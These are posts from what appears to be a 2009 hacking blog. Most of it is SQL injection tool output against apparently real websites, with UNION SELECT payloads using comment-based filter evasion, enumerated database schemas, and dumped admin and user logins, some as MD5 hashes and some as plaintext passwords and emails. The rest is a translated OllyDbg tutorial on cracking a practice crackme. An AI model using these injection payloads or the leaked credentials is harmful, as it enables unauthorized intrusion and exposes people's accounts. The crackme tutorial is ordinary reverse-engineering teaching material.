[2] adminos:admin:
[3] No data

[-] 23:46:39
[-] Total URL Requests 5
[-] Done

Friday, January 16, 2009


10:57 PM Posted by viperfx07 No comments

Tool = v5.0 mod by me
Admin page =
Admin usr:pwd = saropi:saropi

[+] URL:,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 22:52:20
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ukb_dbaseukb
User: ukb_dbaseukb@localhost
Version: 4.0.26-standard-log
[+] Dumping data from database "ukb_dbaseukb" Table "admin"
[+] and Column(s) ['username', 'password']
[+] Number of Rows: 2

[0] saropi:335c20f320d1f837a27e887c33044044:
[1] admin:fe8268e1262102afb740325a7c9706bb:
[2] No data

[-] 22:52:24
[-] Total URL Requests 4
[-] Done

Sunday, January 11, 2009


5:15 PM Posted by viperfx07 1 comment
Update (12/01/09): fixed by admin. Good admin :)

Admin page:
Admin usr/pwd: administrator:h1r0sh1m4
Tool: schemafuzz v5.0 mod by me

[+] URL:**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:56:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t41085_cmsdb
User: t41085_cmsuser@localhost
Version: 5.0.32-Debian_7etch8

[Database]: t41085_cmsdb
[Table: Columns]
[0]tblarticles: id,title,navtitle,content,menuid,specialid,ordernumber,isdisplaynav,publishdate,expiredate,status,metaauthor,metadescription,metakeyword,createdby,createddate,updateddate,updatedby,isdeleted,iscomment,thumbnail
[1]tblbanner: id,ordernumber,createdby,createddate,imglink,title,description
[2]tblcalendar: id,date,title,description,createdby,createddate,day,month,year
[3]tblcomment: id,name,email,comment,articleid,status,isread,createddate,isdeleted,updatedby,updateddate
[4]tblcounter: counter,lastupdated
[5]tblfilelibrary: id,type,tittle,filename,ext,size,link,createdby,createddate,updatedby,updateddate,isdeleted
[6]tblhighlight: id,title,imageid,content,ishardcoded,ordernumber,isactive,createdby,createddate,updatedby,updateddate,isdeleted,imglogo,url,htitle
[7]tblhomepage: id,headerimage,headertitle,contenttitle,footer,createdby,createddate,updateddate,updatedby,content
[8]tbllatestarticles: menuid,title,desc,createdby,createddate,isactive,displayitem,ordernumber
[9]tblmenu: id,title,parentid,isactive,submenu,createdby,createddate,updatedby,updateddate,isdeleted
[10]tblmenuhighlight: id,menuid,highlightid,ordernumber,createdby,createddate
[11]tblmetatag: metaauthor,metadescription,metakeyword
[12]tblpermission: id,userid,menuid,isable,createdby,createddate
[13]tblrotateimages: id,imgid,ordernumber,createdby,createddate,imglink,title,description
[14]tblshout: id,name,email,comment,createddate,isdeleted,updatedby,updateddate,status
[15]tblsubscribelist: id,email,createddate
[16]tblsubscribesent: id,Subject,Body,createddate,createdby,lastsenddate
[17]tbluser: id,login,password,name,email,lastlogin,createdby,createddate,updatedby,updateddate,isdeleted

[-] [16:58:50]
[-] Total URL Requests 159
[-] Done

[+] URL:**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:59:55
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t41085_cmsdb
User: t41085_cmsuser@localhost
Version: 5.0.32-Debian_7etch8
[+] Dumping data from database "t41085_cmsdb" Table "tbluser"
[+] Column(s) ['login', 'password', 'email']
[+] Number of Rows: 6

[2] jimmy:jimmy:jimmy@hs:
[4] user1:1234:user1:

[-] [17:00:06]
[-] Total URL Requests 8
[-] Done

Tuesday, January 6, 2009

[Tutorial] Crack Simple Program with Ollydbg

11:24 AM Posted by viperfx07 , 2 comments
This is a Translation of a text by Bastijs.

The tutorial is based on Net Force crackit3 and was written to help beginning (software) crackers to get started... In the future I'll release an entire series on cracking, which will start at the very basics.

Lets dive right into the cracking..
The program prompts one of these to messages: "ACCESS GRANTED" or "ACCESS DENIED".
We start ollydbg and scroll to the pard that prompts the "ACCESS GRANTED" text.
As you can see this is at address 00402DC1.

see following snippet:

00402DC1 > 8B35 D4104000 MOV ESI,DWORD PTR DS:[<&MSVBVM60.__vbaFr>; MSVBVM60.__vbaFreeObj
00402DC7 . 8D4D 98 LEA ECX,DWORD PTR SS:[EBP-68]
00402DCA . FFD6 CALL ESI ; <&MSVBVM60.__vbaFreeObj>
00402DDE . 68 48214000 PUSH CRACKIT3.00402148 ; UNICODE "ACCESS GRANTED"
00402DE3 . 57 PUSH EDI

At the address 00402DF5 we find the "ACCESS DENIED" message:

00402DF5 > FF91 00030000 CALL DWORD PTR DS:[ECX+300]
00402DFB . 8D55 98 LEA EDX,DWORD PTR SS:[EBP-68]
00402DFE . 50 PUSH EAX
00402DFF . 52 PUSH EDX
00402E5C . 8BF8 MOV EDI,EAX
00402E5E . 68 6C214000 PUSH CRACKIT3.0040216C ; UNICODE "ACCESS DENIED"
00402E63 . 57 PUSH EDI

So what's causing the JUMP to either "ACCESS DENIED" or "ACCESS GRANTED" ?!?
If you check out the piece of code just above the "ACCESS GRANTED" bit. You will spot a JNZ (Jump if not zero) instruction.
at address 00402D6D. This Instruction checks a certain value, and if this value is 0 the program will skip the piece of code that displays the "ACCESS GRANTED" message, and jumps straight to the code that displays "ACCESS DENIED".

This snippet shows this JNZ:

00402D6D . 85C0 TEST EAX,EAX
00402D6F . 0F85 80000000 JNZ CRACKIT3.00402DF5

We want to prevent this from happening. If we were only intrested in showing the "ACCESS GRANTED" message we would simply replace the JNZ in a JZ (Jump if Zero).... The JZ will show up as a JE (Jump if Equal) below, this is due to historic reasons, the two are totally the same.


00402D6F 0F84 80000000 JE CRACKIT3.00402DF5
00402D75 . FF91 00030000 CALL DWORD PTR DS:[ECX+300]

You can make this change by using the edit functionality in Ollydbg (use the right-click menu). Now the program will respond in exactly the opposite way, as it did before. If the value is zero it will display the "ACCESS GRANTED". Ironicly it will now only display "ACCESS DENIED" when you enter the correct password.

However ... because we want to retrieve the password it will be a little bit trickier!

To find the correct password we will probably need to look above the JNZ at address 00402D6F. Since we suppose that program flow is as follows:
-accept input
-check input
-jump to good or bad boy message

When we look above the JNZ we spot a rather akward piece of code, with plenty of JE's and unicode numbers... watch below:

00402964 . 0F80 AD050000 JO CRACKIT3.00402F17
0040296A . 8945 C0 MOV DWORD PTR SS:[EBP-40],EAX
0040296D . FF15 98104000 CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCo>; MSVBVM60.__vbaStrCopy
00402973 . 0FBF45 D8 MOVSX EAX,WORD PTR SS:[EBP-28]
00402977 . 8985 0CFFFFFF MOV DWORD PTR SS:[EBP-F4],EAX
0040297D . 68 AC204000 PUSH CRACKIT3.004020AC ; UNICODE "164"

We can spot 7 of these "UNICODE numbers" so we could assume that the length of the password is 7. However to be sure we look a few instructions before these numbers. At address 0402469 to be exact:

00402469 . FF15 10104000 CALL DWORD PTR DS:[<&MSVBVM60.__vbaLenBs>; MSVBVM60.__vbaLenBstr
0040246F . 33C9 XOR ECX,ECX
00402471 . 83F8 07 CMP EAX,7

CALL MSVBVM60.__vbaLenBstr means that a lenght of a string is calculated. (Most lightly the password ;) )
As you can see the value that is calculated by the CALL is compared to 7 => 00402471 . 83F8 07 CMP EAX,7

So we were right, the lenght of the password is 7!

Now lets go back to the part with the UNICODE numbers, address 00402964. Here the program starts to check the first letter of the password. After every UNICODE number a line with a JE instruction follows. This Instruction will allow you to advance if the letter was correct. JE = Jump if Equal:

0040299C . F6C4 40 TEST AH,40
0040299F . 0F84 2C010000 JE CRACKIT3.00402AD1

We are going to use this location to set breakpoints.. By setting breakpoints we can interupt the normal execution of a program.
If we set a breakpoint at the first 3 JE's (we do this by pressing F2). The program will stop running when it reaches one of those breakpoints.

Go to 0040299F and press F2, the address will now be highlighted in red. (default colors)

Do the same for 004029D0 and 00402A02.

Ok, since the password has to be 7 characters in length, we will run the program (by pressing F5) and enter "aaaaaaa" (7 a's) as password. The program will stop at address 0040299F. We will now press F9 to continue execution. The program will halt again at 0040299F and we will be prompted by the "ACCESS DENIED" message. We an now conclude that the first letter isn't an "a". Since the check is case sensitive we also try "Aaaaaaa" we repeat the other steps and notice this gives us the same result. However we can now try all the letters in the alfabet. We do that and we see that when we enter "Haaaaaa" ollydbg jumps to the second breakpoint, when we press F9 rather than display the bad message. Congratulations, you just found the first letter of the password! Our first letter is 'H'

We repeat all the steps listed above, and discover that "H4aaaaa" gets us to the 3rd breakpoint. Since it's tedious to go through all the checks of the previous letters we change the JE's into JNE (or JNZ same comment as above). Now he wont bother us for the other letters and jump right to the letter we are trying to find.


0040299F . 0F84 2C010000 JE CRACKIT3.00402AD1
0040299F . 0F84 2C010000 JNZ CRACKIT3.00402AD1

If you now type "a4aaaaa" he won't check for the first letter and still go on to checking the second. We also already know the 2'nd letter so we also patch the next JE to JNZ.
Now you can repeat these steps to find the other 7 letters of the password.

I hope this tutorial provided good guidance for crackit3 and that you learned something from it!


(Translation by Rhican)